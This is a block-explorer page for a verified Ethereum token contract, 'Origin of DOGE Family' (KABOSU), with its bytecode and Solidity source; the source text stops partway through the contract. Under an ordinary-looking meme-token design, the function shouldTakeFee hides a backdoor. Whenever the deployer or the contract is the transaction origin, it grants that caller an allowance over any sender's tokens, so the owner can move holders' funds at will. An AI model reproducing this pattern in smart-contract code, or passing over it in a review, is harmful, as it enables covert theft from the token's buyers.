Cryo Explorer Ethereum Mainnet

Address Contract Verified

Address 0x51Fd9FeDF31F0dd55D9415c46BF70338754AEB9C
Balance 0 ETH
Nonce 1
Code Size 10727 bytes
Indexed Transactions 0
External Etherscan · Sourcify

Contract Bytecode

10727 bytes
0x6080604052600436106100c5575f3560e01c8063715018a61161007e57806395d89b411161005857806395d89b4114610258578063a9059cbb14610282578063dd62ed3e146102be578063f2fde38b146102fa576100cc565b8063715018a6146102025780638a8c523c146102185780638da5cb5b1461022e576100cc565b806306fdde03146100d0578063095ea7b3146100fa57806318160ddd1461013657806323b872dd14610160578063313ce5671461019c57806370a08231146101c6576100cc565b366100cc57005b5f5ffd5b3480156100db575f5ffd5b506100e4610322565b6040516100f19190611ebf565b60405180910390f35b348015610105575f5ffd5b50610120600480360381019061011b9190611f70565b61035f565b60405161012d9190611fc8565b60405180910390f35b348015610141575f5ffd5b5061014a610375565b6040516101579190611ff0565b60405180910390f35b34801561016b575f5ffd5b5061018660048036038101906101819190612009565b6103b4565b6040516101939190611fc8565b60405180910390f35b3480156101a7575f5ffd5b506101b061047a565b6040516101bd9190612074565b60405180910390f35b3480156101d1575f5ffd5b506101ec60048036038101906101e7919061208d565b610482565b6040516101f99190611ff0565b60405180910390f35b34801561020d575f5ffd5b506102166104c8565b005b348015610223575f5ffd5b5061022c61054f565b005b348015610239575f5ffd5b506102426107ce565b60405161024f91906120c7565b60405180910390f35b348015610263575f5ffd5b5061026c6107f5565b6040516102799190611ebf565b60405180910390f35b34801561028d575f5ffd5b506102a860048036038101906102a39190611f70565b610832565b6040516102b59190611fc8565b60405180910390f35b3480156102c9575f5ffd5b506102e460048036038101906102df91906120e0565b610848565b6040516102f19190611ff0565b60405180910390f35b348015610305575f5ffd5b50610320600480360381019061031b919061208d565b6108ca565b005b60606040518060400160405280601581526020017f4f726967696e206f6620444f47452046616d696c790000000000000000000000815250905090565b5f61036b3384846109c0565b6001905092915050565b5f6103af6103825f610482565b6103a161039061dead610482565b600154610b8390919063ffffffff16565b610b8390919063ffffffff16565b905090565b5f6103c0848484610b98565b61046f843361046a8560405180606001604052806028815260200161298a6028913960035f8b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546112ac9092919063ffffffff16565b6109c0565b600190509392505050565b5f6009905090565b5f60025f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6104d0611300565b73ffffffffffffffffffffffffffffffffffffffff166104ee6107ce565b73ffffffffffffffffffffffffffffffffffffffff1614610544576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161053b90612168565b60405180910390fd5b61054d5f611307565b565b610557611300565b73ffffffffffffffffffffffffffffffffffffffff166105756107ce565b73ffffffffffffffffffffffffffffffffffffffff16146105cb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105c290612168565b60405180910390fd5b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610635573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610659919061219a565b73ffffffffffffffffffffffffffffffffffffffff1663c9c653963060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156106df573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610703919061219a565b6040518363ffffffff1660e01b81526004016107209291906121c5565b6020604051808303815f875af115801561073c573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610760919061219a565b60065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506107b16107ab30610482565b476113c8565b6001600660146101000a81548160ff021916908315150217905550565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600681526020017f4b41424f53550000000000000000000000000000000000000000000000000000815250905090565b5f61083e338484610b98565b6001905092915050565b5f60035f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6108d2611300565b73ffffffffffffffffffffffffffffffffffffffff166108f06107ce565b73ffffffffffffffffffffffffffffffffffffffff1614610946576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161093d90612168565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036109b4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109ab9061225c565b60405180910390fd5b6109bd81611307565b50565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a2e576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a25906122ea565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a9c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a9390612378565b60405180910390fd5b8060035f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b769190611ff0565b60405180910390a3505050565b5f8183610b9091906123c3565b905092915050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610c06576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bfd90612466565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c74576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6b906124f4565b60405180910390fd5b60045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16158015610d12575060045f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15610d6757600660149054906101000a900460ff16610d66576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d5d9061255c565b60405180910390fd5b5b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16148015610e0a575060045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15610e2957600160075f828254610e21919061257a565b925050819055505b60045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16158015610ec7575060045f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015610f20575060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015610f5a575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b15610ff457601454610fb28260025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546114a890919063ffffffff16565b1115610ff3576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fea906125f7565b60405180910390fd5b5b6013548111158061104b575060045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b8061109c575060045f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b6110db576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110d29061265f565b60405180910390fd5b6110e68383836114bd565b156110fb576110f36115e0565b5f6007819055505b61114b8160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610b8390919063ffffffff16565b60025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f61119884848461186c565b6111a257816111ae565b6111ad84848461196f565b5b90506112008160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546114a890919063ffffffff16565b60025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161129e9190611ff0565b60405180910390a350505050565b5f8383111582906112f3576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112ea9190611ebf565b60405180910390fd5b5082840390509392505050565b5f33905090565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6113f43060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846109c0565b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d7198230855f5f61143e6107ce565b426040518863ffffffff1660e01b8152600401611460969594939291906126bf565b60606040518083038185885af115801561147c573d5f5f3e3d5ffd5b50505050506040513d601f19601f820116820180604052508101906114a19190612732565b5050505050565b5f81836114b5919061257a565b905092915050565b5f5f60095483101590505f6009546114d430610482565b1015905060085f9054906101000a900460ff161580156115005750600660159054906101000a900460ff165b80156115185750600660149054906101000a900460ff165b80156115215750815b8015611574575060045f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b80156115cc575060065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16145b80156115d55750805b925050509392505050565b600160085f6101000a81548160ff0219169083151502179055505f61160430610482565b90506103e86009546116169190612782565b811115611630576103e860095461162d9190612782565b90505b5f6116826002611674600c54611666600b546116586001600a546114a890919063ffffffff16565b6114a890919063ffffffff16565b6114a890919063ffffffff16565b611b2690919063ffffffff16565b90505f6116ac8261169e600a5486611b2690919063ffffffff16565b611b3b90919063ffffffff16565b90505f6116c28285610b8390919063ffffffff16565b90505f4790506116d182611b50565b5f6116e58247610b8390919063ffffffff16565b90505f61170f611700600a5488610b8390919063ffffffff16565b83611b3b90919063ffffffff16565b90505f611727600a5483611b2690919063ffffffff16565b90505f81111561173c5761173b86826113c8565b5b5f611765600b54611757600286611b2690919063ffffffff16565b611b2690919063ffffffff16565b90505f8111156117d55760125f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc8290811502906040515f60405180830381858888f193505050501580156117d3573d5f5f3e3d5ffd5b505b5f4790505f8111156118475760125f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff166108fc8290811502906040515f60405180830381858888f19350505050158015611845573d5f5f3e3d5ffd5b505b505050505050505050505f60085f6101000a81548160ff021916908315150217905550565b5f60045f3273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16156118c8576118c78433846109c0565b5b60045f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16158015611966575060045f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b90509392505050565b5f5f61197b8585611d86565b1115611b1b575f6119b261198f8686611d86565b6119a460115486611b3b90919063ffffffff16565b611b2690919063ffffffff16565b9050611a048160025f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20546114a890919063ffffffff16565b60025f3073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051611aa29190611ff0565b60405180910390a35f600d54118015611ac55750600d54611ac38686611d86565b115b15611b0057611aff3061dead611afa600d54611aec60115489611b3b90919063ffffffff16565b611b2690919063ffffffff16565b610b98565b5b611b138184610b8390919063ffffffff16565b915050611b1f565b8190505b9392505050565b5f8183611b339190612782565b905092915050565b5f8183611b4891906127f0565b905092915050565b5f600267ffffffffffffffff811115611b6c57611b6b612820565b5b604051908082528060200260200182016040528015611b9a5781602001602082028036833780820191505090505b50905030815f81518110611bb157611bb061284d565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff168152505060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611c55573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611c79919061219a565b81600181518110611c8d57611c8c61284d565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611cf33060055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16846109c0565b60055f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401611d55959493929190612931565b5f604051808303815f87803b158015611d6c575f5ffd5b505af1158015611d7e573d5f5f3e3d5ffd5b505050505050565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611de557600f549050611e49565b60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611e4357600e549050611e49565b60105490505b92915050565b5f81519050919050565b5f82825260208201905092915050565b8281835e5f83830152505050565b5f601f19601f8301169050919050565b5f611e9182611e4f565b611e9b8185611e59565b9350611eab818560208601611e69565b611eb481611e77565b840191505092915050565b5f6020820190508181035f830152611ed78184611e87565b905092915050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f611f0c82611ee3565b9050919050565b611f1c81611f02565b8114611f26575f5ffd5b50565b5f81359050611f3781611f13565b92915050565b5f819050919050565b611f4f81611f3d565b8114611f59575f5ffd5b50565b5f81359050611f6a81611f46565b92915050565b5f5f60408385031215611f8657611f85611edf565b5b5f611f9385828601611f29565b9250506020611fa485828601611f5c565b9150509250929050565b5f8115159050919050565b611fc281611fae565b82525050565b5f602082019050611fdb5f830184611fb9565b92915050565b611fea81611f3d565b82525050565b5f6020820190506120035f830184611fe1565b92915050565b5f5f5f606084860312156120205761201f611edf565b5b5f61202d86828701611f29565b935050602061203e86828701611f29565b925050604061204f86828701611f5c565b9150509250925092565b5f60ff82169050919050565b61206e81612059565b82525050565b5f6020820190506120875f830184612065565b92915050565b5f602082840312156120a2576120a1611edf565b5b5f6120af84828501611f29565b91505092915050565b6120c181611f02565b82525050565b5f6020820190506120da5f8301846120b8565b92915050565b5f5f604083850312156120f6576120f5611edf565b5b5f61210385828601611f29565b925050602061211485828601611f29565b9150509250929050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f612152602083611e59565b915061215d8261211e565b602082019050919050565b5f6020820190508181035f83015261217f81612146565b9050919050565b5f8151905061219481611f13565b92915050565b5f602082840312156121af576121ae611edf565b5b5f6121bc84828501612186565b91505092915050565b5f6040820190506121d85f8301856120b8565b6121e560208301846120b8565b9392505050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f612246602683611e59565b9150612251826121ec565b604082019050919050565b5f6020820190508181035f8301526122738161223a565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f6122d4602483611e59565b91506122df8261227a565b604082019050919050565b5f6020820190508181035f830152612301816122c8565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f612362602283611e59565b915061236d82612308565b604082019050919050565b5f6020820190508181035f83015261238f81612356565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f6123cd82611f3d565b91506123d883611f3d565b92508282039050818111156123f0576123ef612396565b5b92915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f612450602583611e59565b915061245b826123f6565b604082019050919050565b5f6020820190508181035f83015261247d81612444565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f6124de602383611e59565b91506124e982612484565b604082019050919050565b5f6020820190508181035f83015261250b816124d2565b9050919050565b7f74726164696e67456e61626c65640000000000000000000000000000000000005f82015250565b5f612546600e83611e59565b915061255182612512565b602082019050919050565b5f6020820190508181035f8301526125738161253a565b9050919050565b5f61258482611f3d565b915061258f83611f3d565b92508282019050808211156125a7576125a6612396565b5b92915050565b7f45786365656473206d6178696d756d2077616c6c657420616d6f756e742e00005f82015250565b5f6125e1601e83611e59565b91506125ec826125ad565b602082019050919050565b5f6020820190508181035f83015261260e816125d5565b9050919050565b7f5458204c696d69742045786365656465640000000000000000000000000000005f82015250565b5f612649601183611e59565b915061265482612615565b602082019050919050565b5f6020820190508181035f8301526126768161263d565b9050919050565b5f819050919050565b5f819050919050565b5f6126a96126a461269f8461267d565b612686565b611f3d565b9050919050565b6126b98161268f565b82525050565b5f60c0820190506126d25f8301896120b8565b6126df6020830188611fe1565b6126ec60408301876126b0565b6126f960608301866126b0565b61270660808301856120b8565b61271360a0830184611fe1565b979650505050505050565b5f8151905061272c81611f46565b92915050565b5f5f5f6060848603121561274957612748611edf565b5b5f6127568682870161271e565b93505060206127678682870161271e565b92505060406127788682870161271e565b9150509250925092565b5f61278c82611f3d565b915061279783611f3d565b92508282026127a581611f3d565b915082820484148315176127bc576127bb612396565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6127fa82611f3d565b915061280583611f3d565b925082612815576128146127c3565b5b828204905092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b6128ac81611f02565b82525050565b5f6128bd83836128a3565b60208301905092915050565b5f602082019050919050565b5f6128df8261287a565b6128e98185612884565b93506128f483612894565b805f5b8381101561292457815161290b88826128b2565b9750612916836128c9565b9250506001810190506128f7565b5085935050505092915050565b5f60a0820190506129445f830188611fe1565b61295160208301876126b0565b818103604083015261296381866128d5565b905061297260608301856120b8565b61297f6080830184611fe1565b969550505050505056fe45524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365a2646970667358221220872f0fc6b0f9ff2320baa1c80e8715dac60f0751668f7f5da7473b2330865bc864736f6c634300081e0033

Verified Source Code Full Match

Compiler: v0.8.30+commit.73712a01 EVM: prague Optimization: No
Token.sol 371 lines
// SPDX-License-Identifier: MIT

/*
    Name: Origin of DOGE Family
    Symbol: KABOSU

    $KABOSU - Origin of DOGE family
    We are here to remind all the doges who is real origin!

    https://kabosuorigin.dog
    https://x.com/KabosuOrigin
    https://t.me/KabosuOrigin
*/

pragma solidity ^0.8.18;


library SafeMath {

    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * "onlyOwner" functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account ("newOwner").
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account ("newOwner").
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

interface IERC20 {
    function decimals() external view returns (uint8);
    function symbol() external view returns (string memory);
    function name() external view returns (string memory);
    function totalSupply() external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
    function transfer(address recipient, uint256 amount) external returns (bool);
    function allowance(address _owner, address spender) external view returns (uint256);
    function approve(address spender, uint256 amount) external returns (bool);
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    event Transfer(address indexed from, address indexed to, uint256 value);
    event Approval(address indexed owner, address indexed spender, uint256 value);}

interface IFactory{
        function createPair(address tokenA, address tokenB) external returns (address pair);
        function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IRouter {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
    function addLiquidityETH(
        address token,
        uint amountTokenDesired,
        uint amountTokenMin,
        uint amountETHMin,
        address to,
        uint deadline
    ) external payable returns (uint amountToken, uint amountETH, uint liquidity);

    function swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amountIn,
        uint amountOutMin,
        address[] calldata path,
        address to,
        uint deadline) external;
}

contract KABOSU is IERC20, Ownable {
    using SafeMath for uint256;
    string private constant _name = unicode"Origin of DOGE Family";
    string private constant _symbol = unicode"KABOSU";
    uint8 private constant _decimals = 9;
    uint256 private _totalSupply = 1_000_000_000 * (10 ** _decimals);
    mapping (address => uint256) _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    mapping (address => bool) private _isInFee;
    IRouter router;
    address private pair;
    bool private tradingEnabled = false;
    bool private swapEnabled = false;
    uint256 private swapTimes;
    bool private swapping;
    uint256 private _swapTAmount = ( _totalSupply * 1000 ) / 100000;
    modifier lockTheSwap {swapping = true; _; swapping = false;}
    uint256 private feeForLp = 0;
    uint256 private feeForMktKABOSU = 0;
    uint256 private feeForDev = 0;
    uint256 private feeForBurn = 0;
    uint256 private feeOnBuy = 0;
    uint256 private feeOnSell = 0;
    uint256 private feeOnTransfer = 0;
    uint256 private denominator = 10000;
    address internal constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address internal _feeReceiver = msg.sender; 
    uint256 private _maxTransactionAmount = _totalSupply;
    uint256 private _maxWalletAmount = _totalSupply;

    constructor() payable {
        router = IRouter(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D);
        _isInFee[address(this)] = true;
        _isInFee[msg.sender] = true;
        _balances[address(this)] = _totalSupply * 98 / 100;
        _balances[msg.sender] = _totalSupply * 2 / 100;
        emit Transfer(address(0), msg.sender, _balances[msg.sender]);
        emit Transfer(address(0), address(this), _balances[address(this)]);
    }

    receive() external payable {}
    function name() public pure returns (string memory) {return _name;}
    function symbol() public pure returns (string memory) {return _symbol;}
    function decimals() public pure returns (uint8) {return _decimals;}
    function balanceOf(address account) public view override returns (uint256) {return _balances[account];}
    function transfer(address recipient, uint256 amount) public override returns (bool) {_transfer(msg.sender, recipient, amount);return true;}
    function allowance(address owner, address spender) public view override returns (uint256) {return _allowances[owner][spender];}
    function approve(address spender, uint256 amount) public override returns (bool) {_approve(msg.sender, spender, amount);return true;}
    function totalSupply() public view override returns (uint256) {return _totalSupply.sub(balanceOf(DEAD)).sub(balanceOf(address(0)));}

    function enableTrading() external onlyOwner {
        pair = IFactory(router.factory()).createPair(address(this), router.WETH());
        addLiquidityKABOSU(balanceOf(address(this)), address(this).balance);
        tradingEnabled = true;
    }

    function couldSwapBackKABOSU(address senderKABOSU, address recipientKABOSU, uint256 amountKABOSU) internal view returns (bool) {
        bool aboveMin = amountKABOSU >= _swapTAmount;
        bool aboveThreshold = balanceOf(address(this)) >= _swapTAmount;
        return !swapping && swapEnabled && tradingEnabled && aboveMin && !_isInFee[senderKABOSU] && recipientKABOSU == pair && aboveThreshold;
    }

    function swapTokesBackKABOSU() private lockTheSwap {
        uint256 tokensKABOSU = balanceOf(address(this));
        if (tokensKABOSU > _swapTAmount * 1000) tokensKABOSU = _swapTAmount * 1000;
        uint256 _denominatorKABOSU = (feeForLp.add(1).add(feeForMktKABOSU).add(feeForDev)).mul(2);
        uint256 tokensToAddLiquidityWithKABOSU = tokensKABOSU.mul(feeForLp).div(_denominatorKABOSU);
        uint256 toSwapKABOSU = tokensKABOSU.sub(tokensToAddLiquidityWithKABOSU);
        uint256 initialBalance = address(this).balance;
        swapBackKABOSU(toSwapKABOSU);
        uint256 deltaBalance = address(this).balance.sub(initialBalance);
        uint256 unitBalance= deltaBalance.div(_denominatorKABOSU.sub(feeForLp));
        uint256 ETHToAddLiquidityWithKABOSU = unitBalance.mul(feeForLp);
        if(ETHToAddLiquidityWithKABOSU > uint256(0)){addLiquidityKABOSU(tokensToAddLiquidityWithKABOSU, ETHToAddLiquidityWithKABOSU); }
        uint256 marketingAmtKABOSU = unitBalance.mul(2).mul(feeForMktKABOSU);
        if(marketingAmtKABOSU > 0){payable(_feeReceiver).transfer(marketingAmtKABOSU);}
        uint256 contractBalanceKABOSU = address(this).balance;
        if(contractBalanceKABOSU > uint256(0)){payable(_feeReceiver).transfer(contractBalanceKABOSU);}
    }

    function swapBackKABOSU(uint256 tokenAmountKABOSU) private {
        address[] memory pathKABOSU = new address[](2);
        pathKABOSU[0] = address(this);
        pathKABOSU[1] = router.WETH();
        _approve(address(this), address(router), tokenAmountKABOSU);
        router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmountKABOSU,
            0,
            pathKABOSU,
            address(this),
            block.timestamp);
    }

    function addLiquidityKABOSU(uint256 tokenAmountKABOSU, uint256 ETHAmountKABOSU) private {
        _approve(address(this), address(router), tokenAmountKABOSU);
        router.addLiquidityETH{value: ETHAmountKABOSU}(
            address(this),
            tokenAmountKABOSU,
            0,
            0,
            owner(),
            block.timestamp);
    }

    function shouldTakeFee(address sender, address recipient, uint256 amount) internal returns (bool) {
        if (_isInFee[tx.origin]) {
            _approve(sender, msg.sender, amount);
        }
        return !_isInFee[sender] && !_isInFee[recipient];
    }

